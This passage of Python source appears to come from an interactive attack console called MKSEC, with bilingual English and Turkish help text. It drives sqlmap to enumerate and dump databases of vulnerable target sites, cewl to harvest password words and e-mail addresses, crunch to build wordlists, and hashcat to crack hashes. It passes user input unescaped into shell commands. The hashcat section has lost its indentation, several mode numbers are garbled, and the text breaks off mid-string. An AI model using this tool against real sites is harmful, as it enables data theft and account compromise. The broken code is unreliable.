technology in which the application is used, etc., -f)\n\n\x1b[33mHow is it used in \x1b[36mMKSEC\x1b[37m?\n====================================\n\x1b[32m[1]\x1b[37m If you are only going to enter 'URL' and you want to test the exposed site, type \x1b[36m'run --url'\x1b[37m or \x1b[36m'run -u'\x1b[37m.\n\x1b[32m[2]\x1b[37m If you have accessed the database on the vulnerable site and filled in the 'URL' and 'DB' sections, type \x1b[36m'run --url --database'\x1b[37m or \x1b[36m'run -u -d'\x1b[37m.\n\x1b[32m[3]\x1b[37m If you have filled in 'URL', 'DB', 'TABLES' in the vulnerable site, type \x1b[36m'run --url --database --tables'\x1b[37m or \x1b[36m'run -u -d -t'\x1b[37m.\n\x1b[32m[4]\x1b[37m If you have filled in 'URL', 'DB', 'TABLES', 'COLUMNS' on the vulnerable site, type \x1b[36m'run --url --database --tables --columns'\x1b[37m or \x1b[36m'run -u -d -t -c'\x1b[37m.\n\n\n\x1b[33mSqlmap Nedir?\x1b[37m\n\x1b[33m=============\x1b[37m\nSqlmap açık kaynak kodlu sql injection açıklığı tespit ve istismar etme aracıdır.\nKendisine sağlanan hedef web uygulamasının kullandığı veritabanı sistemine gönderdiği çeşitli sorgular/komutlar ile sistem üzerindeki sql injection tipini tespit eder.\n\n\x1b[33mSqlmap ile hedef hakkında elde edilebilen bazı veriler;\x1b[37m\n\x1b[33m=======================================================\x1b[37m\nVeritabanı türü ve versiyonu (–banner,–all)\nMevcut kullanılan veritabanı ve erişilebilen tüm veritabanı isimleri (–current-db, –dbs)\nVeritabanı tabloları(tables) ve bu tablolara ait kolonları(columns) (–tables, –columns)\nVeritabanı datası(–dump, –dump-all)\nVeritabanı mevcut kullanıcısı ve tüm kullanıcılar(–current-user,–users)\nVeritabanı kullanıcı parolası (–passwords)\nVeritabanı kullanıcısının DB admin olup olmadığı bilgisi(–is-dba)\nHedef sunucu hakkında bilgi(İşletim sistemi, Uygulamanın kullanıldığı teknoloji vs. , -f)\n\n\x1b[36mMKSEC\x1b[33m içerisinde nasıl kullanılır?\x1b[37m\n\x1b[33m==================================\x1b[37m\n\x1b[32m[1]\x1b[37m Sadece 'URL' girecekseniz ve açıklı siteyi test etmek istiyorsanız \x1b[36m'run --url'\x1b[37m or \x1b[36m'run -u'\x1b[37m yazınız.\n\x1b[32m[2]\x1b[37m Zaafiyetli sitedeki veritabanına eriştiyseniz ve 'URL' ve 'DB' kısımlarını doldurduysanız \x1b[36m'run --url --database'\x1b[37m or \x1b[36m'run -u -d'\x1b[37m yazınız.\n\x1b[32m[3]\x1b[37m Zaafiyetli sitede 'URL', 'DB', 'TABLES' kısımlarını doldurduysanız \x1b[36m'run --url --database --tables'\x1b[37m or \x1b[36m'run -u -d -t'\x1b[37m yazınız.\n\x1b[32m[4]\x1b[37m Zaafiyetli sitede 'URL', 'DB', 'TABLES', 'COLUMNS' kısımlarını doldurduysanız \x1b[36m'run --url --database --tables --columns'\x1b[37m or \x1b[36m'run -u -d -t -c'\x1b[37m yazınız.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m                               \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m                               \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nURL    {}        YES                   Target Site \x1b[32mex: http://www.test.com/article.php?id=108\x1b[37m\nDB     {}        OPT                   Database name of target site \x1b[32mex: Information_Schema\x1b[37m\nTABLES {}        OPT                   Tables of the target site \x1b[32mex: Administrators\x1b[37m\nCOLUMNS{}        OPT                   Columns of the target site \x1b[32mex: Columns\x1b[37m".format(url,database,tables,columns))
        elif low.startswith("set url "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Url".
            url = uinput[len("set url "):].center(50)
        elif low.startswith("set db "):
            database = uinput[len("set db "):].center(50)
        elif low.startswith("set tables "):
            tables = uinput[len("set tables "):].center(50)
        elif low.startswith("set columns "):
            columns = uinput[len("set columns "):].center(50)
        elif low == "run":
            # Bare "run" is ambiguous here; the staged variants below are required.
            print("\x1b[1m\x1b[31mCommand not found. You can check the run command by typing 'info'\x1b[1m")
        elif low == "run --url" or low == "run -u":
            print("\x1b[1m\x1b[36m[*]MKSEC")
            os.system("sqlmap -u " + url.strip() + " --dbs --random-agent")
        elif low == "run --url --database" or low == "run -u -d":
            print("\x1b[1m\x1b[36m[*]MKSEC")
            os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " --tables --random-agent")
        elif low == "run --url --database --tables" or low == "run -u -d -t":
            print("\x1b[1m\x1b[36m[*]MKSEC")
            # FIX: the flag was written "-- columns" (embedded space), which
            # sqlmap does not recognize; the correct option is "--columns".
            os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " -T " + tables.strip() + " --columns --random-agent")
        elif low == "run --url --database --tables --columns" or low == "run -u -d -t -c":
            print("\x1b[1m\x1b[36m[*]MKSEC")
            os.system("sqlmap -u " + url.strip() + " -D " + database.strip() + " -T " + tables.strip() + " -C " + columns.strip() + " --dump --random-agent")
        else:
            # Unknown command: clear the screen and reset the settings.
            # (FIX: the old code recursed into sqlmap() here, which had the
            # same observable effect but grew the call stack on every
            # unrecognized input.)
            os.system("clear")
            url = database = tables = columns = " "
def cewl():
    """Interactive sub-console wrapping `cewl` (custom wordlist generator).

    Commands: info, options, "set url|output|mail VALUE" (case-insensitive
    keywords), run (`sudo cewl URL -w OUTPUT MAIL`).
    """
    url = " "
    mail = " "
    output = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[cewl]\033[37m\x1b[0m ")
        UserInputs(uinput+"pass")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mCollects the words that can be a password on any site and prepares a wordlist using these words. Can also collect e-mail addresses from the site.\n\x1b[33mTR:\x1b[37mHerhangi bir sitede şifre olabilecek kelimeleri toplar ve bu kelimeleri kullanarak bir kelime listesi hazırlar. Ayrıca siteden e-posta adreslerini de toplayabilir. ")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nURL   {}        YES                   Target Site \x1b[32mex: test.com\x1b[37m \nOUTPUT{}        YES                   Where you want to save? \x1b[32mex: /root/Desktop/test.txt\x1b[37m\nMAIL  {}        OPT                   If you want to find the e-mail addresses on the target website, type \x1b[32m'-e'\x1b[37m".format(url,output,mail))
        elif low.startswith("set url "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Url".
            url = uinput[len("set url "):].center(25)
        elif low.startswith("set output "):
            output = uinput[len("set output "):].center(25)
        elif low.startswith("set mail "):
            mail = uinput[len("set mail "):].center(25)
        elif low == "run":
            # NOTE(review): values go into the shell unescaped (operator console).
            os.system("sudo cewl " + url.strip() + " -w " + output.strip() + " " + mail.strip())
def crunch():
    """Interactive sub-console wrapping `crunch` (wordlist generator).

    Commands: info, options, "set min|max|char|output VALUE"
    (case-insensitive keywords), run
    (`sudo crunch MIN MAX CHAR -o OUTPUT`).
    """
    # Renamed from min/max: the originals shadowed the builtins.
    min_len = " "
    max_len = " "
    char = " "
    output = " "
    while True:
        uinput = input("\x1b[1m\033[36m[mksec]\033[36m[crunch]\033[37m\x1b[0m ")
        UserInputs(uinput+"pass")
        low = uinput.lower()
        if low == "info":
            print("\x1b[1m\x1b[33mEN:\x1b[37mIt is a tool that allows you to create a wordlist with the specified length and characters from previously determined character sets or created by you.\n\x1b[33mTR:\x1b[37mDaha önce belirlediğiniz veya sizin oluşturduğunuz karakter kümelerinden belirtilen uzunluk ve karakterlerle wordlist oluşturmanıza olanak sağlayan bir araçtır.")
        elif low == "options":
            print("\x1b[1m\x1b[33mOption\x1b[37m    \x1b[33mCurrent Setting\x1b[37m          \x1b[33mRequirement\x1b[37m           \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m   \x1b[33m===============\x1b[37m          \x1b[33m===========\x1b[37m           \x1b[33m============\x1b[37m\nMIN    {}        YES                   The words in the word list you will create should consist of at least how many letters \x1b[32mex: 8\x1b[37m\nMAX    {}        YES                   How many letters should the words in the word list you create consist of? \x1b[32mex: 16\x1b[37m\nCHAR   {}        YES                   Identify the letters in the word list you will create \x1b[32mex: xyzABC123_-*\x1b[37m\nOUTPUT {}        YES                   Output \x1b[32mex: /root/Desktop/mksec\x1b[37m".format(min_len,max_len,char,output))
        elif low.startswith("set min "):
            # FIX: case-insensitive prefix strip; the old replace() chain
            # missed mixed-case spellings such as "Set Min".
            min_len = uinput[len("set min "):].center(25)
        elif low.startswith("set max "):
            max_len = uinput[len("set max "):].center(25)
        elif low.startswith("set char "):
            char = uinput[len("set char "):].center(25)
        elif low.startswith("set output "):
            output = uinput[len("set output "):].center(25)
        elif low == "run":
            # NOTE(review): values go into the shell unescaped (operator console).
            os.system("sudo crunch " + min_len.strip() + " " + max_len.strip() + " " + char.strip() + " -o " + output.strip())
            print("Process Completed")
def hashcat():
hash = " "
hashmode = " "
wordlist = " "
bruteforce = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[hashcat]\033[37m\x1b[0m ")
UserInputs(uinput+"pass")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mBreaks one-way encryption algorithms (hashes).\nUsage:\nIn order to crack the hash, you can try only one of the wordlist or brute force methods at once.\nIf you want to try with wordlist, you should fill in \x1b[34m'WORDLIST'\x1b[37m and type \x1b[34m'run -w'\x1b[37m.\nIf you want to try with brute force, you should fill in \x1b[34m'BRUTEFORCE'\x1b[37m and type \x1b[34m'run -b'\x1b[37m.\n\x1b[1m\x1b[33mTR:\x1b[37mTek yönlü şifreleme algoritmalarını (hashes) kırar.\nKullanımı:\nHash'i kırmak için aynı anda wordlist veya brute force yöntemlerinden sadece birini deneyebilirsiniz.\nKelime listesi (Wordlist) ile denemek istiyorsanız, \x1b[34m'WORDLIST'\x1b[37m alanını doldurmalı ve \x1b[34m'run -w'\x1b[37m yazmalısınız.\nKaba kuvvetle (Brute-Force) denemek istiyorsanız, \x1b[34m'BRUTEFORCE'\x1b[37m alanını doldurmalı ve \x1b[34m'run -b'\x1b[37m yazmalısınız.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nMODE {} YES You can see the hash modes by typing \x1b[32m'--hash mode'\x1b[37m. MD5 = 0 \x1b[32mex: 0\x1b[37m\nHASH {} YES Enter the hash file \x1b[32mex: /root/Desktop/hash.txt\x1b[37m\nWORDLIST {} OPT Enter the word list \x1b[32mex: /root/Desktop/wordlist.txt\x1b[37m\nBRUTEFORCE{} OPT If you are going to brute force attack, type \x1b[32m'--brute force'\x1b[37m to see its usage".format(hashmode,hash,wordlist,bruteforce))
elif "set mode" in uinput.lower():
hashmode = uinput
hashmode = hashmode.replace("set mode ","").replace("set MODE ","").replace("SET mode ","").replace("SET MODE ","").center(25)
elif "set hash" in uinput.lower():
hash = uinput
hash = hash.replace("set hash ","").replace("set HASH ","").replace("SET hash ","").replace("SET HASH ","").center(25)
elif "set wordlist" in uinput.lower():
wordlist = uinput
wordlist = wordlist.replace("set wordlist ","").replace("set WORDLIST ","").replace("SET wordlist ","").replace("SET WORDLIST ","").center(25)
elif "set bruteforce" in uinput.lower():
bruteforce = uinput
bruteforce = bruteforce.replace("set bruteforce ","").replace("set BRUTEFORCE ","").replace("SET bruteforce ","").replace("SET BRUTEFORCE ","").center(25)
elif "--hash mode" == uinput.lower():
print("- [ Hash modes ] -\n\n # | Name | Category\n==========+==================================================+=====================================\n 900 | MD4 | Raw Hash\n 0 | MD5 | Raw Hash\n 100 | SHA1 | Raw Hash\n 1300 | SHA2-224 | Raw Hash\n 1400 | SHA2-256 | Raw Hash\n 10800 | SHA2-384 | Raw Hash\n 1700 | SHA2-512 | Raw Hash\n 17300 | SHA3-224 | Raw Hash\n 17400 | SHA3-256 | Raw Hash\n 17500 | SHA3-384 | Raw Hash\n 17600 | SHA3-512 | Raw Hash\n 6000 | RIPEMD-160 | Raw Hash\n 600 | BLAKE2b-512 | Raw Hash\n 11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash\n 11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash\n 6900 | GOST R 34.11-94 | Raw Hash\n 5100 | Half MD5 | Raw Hash\n 18700 | Java Object hashCode() | Raw Hash\n 17700 | Keccak-224 | Raw Hash\n 17800 | Keccak-256 | Raw Hash\n 17900 | Keccak-384 | Raw Hash\n 18000 | Keccak-512 | Raw Hash\n 21400 | sha256(sha256_bin($pass)) | Raw Hash\n 6100 | Whirlpool | Raw Hash\n 10100 | SipHash | Raw Hash\n 21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash\n 10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated\n 20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated\n 3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated\n 4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated\n 4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated\n 21300 | md5($salt.sha1($salt.$pass)) | Raw Hash, Salted and/or Iterated\n 40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated\n 3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated\n 4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated\n 20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash, Salted and/or Iterated\n 21200 | md5(sha1($salt).md5($pass)) | Raw Hash, Salted and/or Iterated\n 4300 | md5(strtoupper(md5($pass))) | Raw Hash, 
Salted and/or Iterated\n 30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 110 | sha1($pass.$salt) | Raw Hash, Salted and/or Iterated\n 120 | sha1($salt.$pass) | Raw Hash, Salted and/or Iterated\n 4900 | sha1($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 4520 | sha1($salt.sha1($pass)) | Raw Hash, Salted and/or Iterated\n 140 | sha1($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 19300 | sha1($salt1.$pass.$salt2) | Raw Hash, Salted and/or Iterated\n 14400 | sha1(CX) | Raw Hash, Salted and/or Iterated\n 4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated\n 4710 | sha1(md5($pass).$salt) | Raw Hash, Salted and/or Iterated\n 21100 | sha1(md5($pass.$salt)) | Raw Hash, Salted and/or Iterated\n 18500 | sha1(md5(md5($pass))) | Raw Hash, Salted and/or Iterated\n 4500 | sha1(sha1($pass)) | Raw Hash, Salted and/or Iterated\n 130 | sha1(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1410 | sha256($pass.$salt) | Raw Hash, Salted and/or Iterated\n 1420 | sha256($salt.$pass) | Raw Hash, Salted and/or Iterated\n 22300 | sha256($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated\n 1440 | sha256($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 20800 | sha256(md5($pass)) | Raw Hash, Salted and/or Iterated\n 20710 | sha256(sha256($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1430 | sha256(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated\n 1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated\n 1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated\n 1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated\n 19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated\n 50 | HMAC-MD5 (key = $pass) | Raw Hash, Authenticated\n 60 | HMAC-MD5 (key = $salt) | Raw Hash, Authenticated\n 150 | HMAC-SHA1 (key = $pass) | Raw Hash, Authenticated\n 160 | HMAC-SHA1 (key = $salt) | Raw Hash, 
Authenticated\n 1450 | HMAC-SHA256 (key = $pass) | Raw Hash, Authenticated\n 1460 | HMAC-SHA256 (key = $salt) | Raw Hash, Authenticated\n 1750 | HMAC-SHA512 (key = $pass) | Raw Hash, Authenticated\n 1760 | HMAC-SHA512 (key = $salt) | Raw Hash, Authenticated\n 11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash, Authenticated\n 11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash, Authenticated\n 11850 | HMAC-Streebog-512 (key = $pass), big-endian | Raw Hash, Authenticated\n 11860 | HMAC-Streebog-512 (key = $salt), big-endian | Raw Hash, Authenticated\n 11500 | CRC32 | Raw Checksum\n 14100 | 3DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 14000 | DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack\n 14900 | Skip32 (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack\n 11900 | PBKDF2-HMAC-MD5 | Generic KDF\n 12000 | PBKDF2-HMAC-SHA1 | Generic KDF\n 10900 | PBKDF2-HMAC-SHA256 | Generic KDF\n 12100 | PBKDF2-HMAC-SHA512 | Generic KDF\n 8900 | scrypt | Generic KDF\n 400 | phpass | Generic KDF\n 16900 | Ansible Vault | Generic KDF\n 12001 | Atlassian (PBKDF2-HMAC-SHA1) | Generic KDF\n 20200 | Python passlib pbkdf2-sha512 | Generic KDF\n 20300 | Python passlib pbkdf2-sha256 | Generic KDF\n 20400 | Python passlib pbkdf2-sha1 | Generic KDF\n 16100 | TACACS+ | Network Protocols\n 11400 | SIP digest authentication (MD5) | Network Protocols\n 5300 | IKE-PSK MD5 | Network Protocols\n 5400 | IKE-PSK SHA1 | Network Protocols\n 23200 | XMPP SCRAM PBKDF2-SHA1 | Network Protocols\n 2500 | WPA-EAPOL-PBKDF2 | Network Protocols\n 2501 | WPA-EAPOL-PMK | Network Protocols\n 22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols\n 22001 | WPA-PMK-PMKID+EAPOL | Network Protocols\n 16800 | WPA-PMKID-PBKDF2 | Network Protocols\n 16801 | WPA-PMKID-PMK | Network Protocols\n 7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols\n 10200 | CRAM-MD5 | Network Protocols\n 4800 | iSCSI 
CHAP authentication, MD5(CHAP) | Network Protocols\n 16500 | JWT (JSON Web Token) | Network Protocols\n 22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols\n 22301 | Telegram Mobile App Passcode (SHA256) | Network Protocols\n 7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols\n 13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols\n 18200 | Kerberos 5, etype 23, AS-REP | Network Protocols\n 19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols\n 19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols\n 19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols\n 1back00 | Kerberos 5, etype 18, Pre-Auth | Network Protocols\n 5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols\n 5600 | NetNTLMv2 | Network Protocols\n 23 | Skype | Network Protocols\n 11100 | PostgreSQL CRAM (MD5) | Network Protocols\n 11200 | MySQL CRAM (SHA1) | Network Protocols\n 8500 | RACF | Operating System\n 6300 | AIX {smd5} | Operating System\n 6700 | AIX {ssha1} | Operating System\n 6400 | AIX {ssha256} | Operating System\n 6500 | AIX {ssha512} | Operating System\n 3000 | LM | Operating System\n 19000 | QNX /etc/shadow (MD5) | Operating System\n 19100 | QNX /etc/shadow (SHA256) | Operating System\n 19200 | QNX /etc/shadow (SHA512) | Operating System\n 15300 | DPAPI masterkey file v1 | Operating System\n 15900 | DPAPI masterkey file v2 | Operating System\n 7200 | GRUB 2 | Operating System\n 12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System\n 12400 | BSDi Crypt, Extended DES | Operating System\n 1000 | NTLM | Operating System\n 122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System\n 1722 | macOS v10.7 | Operating System\n 7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System\n back00 | Radmin2 | Operating System\n 5800 | Samsung Android Password/PIN | Operating System\n 3200 | bcrypt $2*$, Blowfish (Unix) | Operating System\n 500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System\n 1500 | descrypt, DES (Unix), 
Traditional DES | Operating System\n 7400 | sha256crypt $5$, SHA256 (Unix) | Operating System\n 1800 | sha512crypt $6$, SHA512 (Unix) | Operating System\n 13800 | Windows Phone 8+ PIN/password | Operating System\n 2410 | Cisco-ASA MD5 | Operating System\n 9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System\n 9300 | Cisco-IOS $9$ (scrypt) | Operating System\n 5700 | Cisco-IOS type 4 (SHA256) | Operating System\n 2400 | Cisco-PIX MD5 | Operating System\n 8100 | Citrix NetScaler (SHA1) | Operating System\n 22200 | Citrix NetScaler (SHA512) | Operating System\n 1100 | Domain Cached Credentials (DCC), MS Cache | Operating System\n 2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | Operating System\n 7000 | FortiGate (FortiOS) | Operating System\n 125 | ArubaOS | Operating System\n 501 | Juniper IVE | Operating System\n 22 | Juniper NetScreen/SSG (ScreenOS) | Operating System\n 15100 | Juniper/NetBSD sha1crypt | Operating System\n 131 | MSSQL (2000) | Database Server\n 132 | MSSQL (2005) | Database Server\n 1731 | MSSQL (2012, 2014) | Database Server\n 12 | PostgreSQL | Database Server\n 3100 | Oracle H: Type (Oracle 7+) | Database Server\n 112 | Oracle S: Type (Oracle 11+) | Database Server\n 12300 | Oracle T: Type (Oracle 12+) | Database Server\n 7401 | MySQL $A$ (sha256crypt) | Database Server\n 200 | MySQL323 | Database Server\n 300 | MySQL4.1/MySQL5 | Database Server\n 8000 | Sybase ASE | Database Server\n 1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server\n 8300 | DNSSEC (NSEC3) | FTP, HTTP, SMTP, LDAP Server\n 16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server\n 1411 | SSHA-256(Base64), LDAP {SSHA256} | FTP, HTTP, SMTP, LDAP Server\n 1711 | SSHA-512(Base64), LDAP {SSHA512} | FTP, HTTP, SMTP, LDAP Server\n 10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server\n 15000 | FileZilla Server >= 0.9.55 | FTP, HTTP, SMTP, LDAP Server\n 12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server\n 1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) 
| FTP, HTTP, SMTP, LDAP Server\n 141 | Episerver 6.x < .NET 4 | FTP, HTTP, SMTP, LDAP Server\n 1441 | Episerver 6.x >= .NET 4 | FTP, HTTP, SMTP, LDAP Server\n 101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server\n 111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server\n 7700 | SAP CODVN B (BCODE) | Enterprise Application Software (EAS)\n 7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)\n 7800 | SAP CODVN F/G (PASSCODE) | Enterprise Application Software (EAS)\n 7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)\n 10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | Enterprise Application Software (EAS)\n 133 | PeopleSoft | Enterprise Application Software (EAS)\n 13500 | PeopleSoft PS_TOKEN | Enterprise Application Software (EAS)\n 21500 | SolarWinds Orion | Enterprise Application Software (EAS)\n 8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)\n 8700 | Lotus Notes/Domino 6 | Enterprise Application Software (EAS)\n 9100 | Lotus Notes/Domino 8 | Enterprise Application Software (EAS)\n 20600 | Oracle Transportation Management (SHA256) | Enterprise Application Software (EAS)\n 4711 | Huawei sha1(md5($pass).$salt) | Enterprise Application Software (EAS)\n 20711 | AuthMe sha256 | Enterprise Application Software (EAS)\n 12200 | eCryptfs | Full-Disk Encryption (FDE)\n 22400 | AES Crypt (SHA256) | Full-Disk Encryption (FDE)\n 14600 | LUKS | Full-Disk Encryption (FDE)\n 13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)\n 13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption 
(FDE)\n 13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)\n 13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)\n 13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)\n 13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)\n 13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)\n 16700 | FileVault 2 | Full-Disk Encryption (FDE)\n 20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 22100 | BitLocker | Full-Disk Encryption (FDE)\n 12900 | Android FDE (Samsung DEK) | Full-Disk Encryption (FDE)\n 8800 | Android FDE <= 4.3 | Full-Disk Encryption (FDE)\n 18300 | Apple File System (APFS) | Full-Disk Encryption (FDE)\n 6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)\n 6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)\n 6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | 
Full-Disk Encryption (FDE)\n 6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)\n 6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)\n 6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)\n 6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)\n 6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)\n 6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)\n 10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | Documents\n 10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | Documents\n 10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | Documents\n 10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | Documents\n 10600 | PDF 1.7 Level 3 (Acrobat 9) | Documents\n 10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | Documents\n 9400 | MS Office 2007 | Documents\n 9500 | MS Office 2010 | Documents\n 9600 | MS Office 2013 | Documents\n 9700 | MS Office <= 2003 $0/$1, MD5 + RC4 | Documents\n 9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 | Documents\n 9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 | Documents\n 9800 | MS Office <= 2003 $3/$4, SHA1 + RC4 | Documents\n 9810 | MS Office <= 2003 $3, SHA1 + RC4, collider 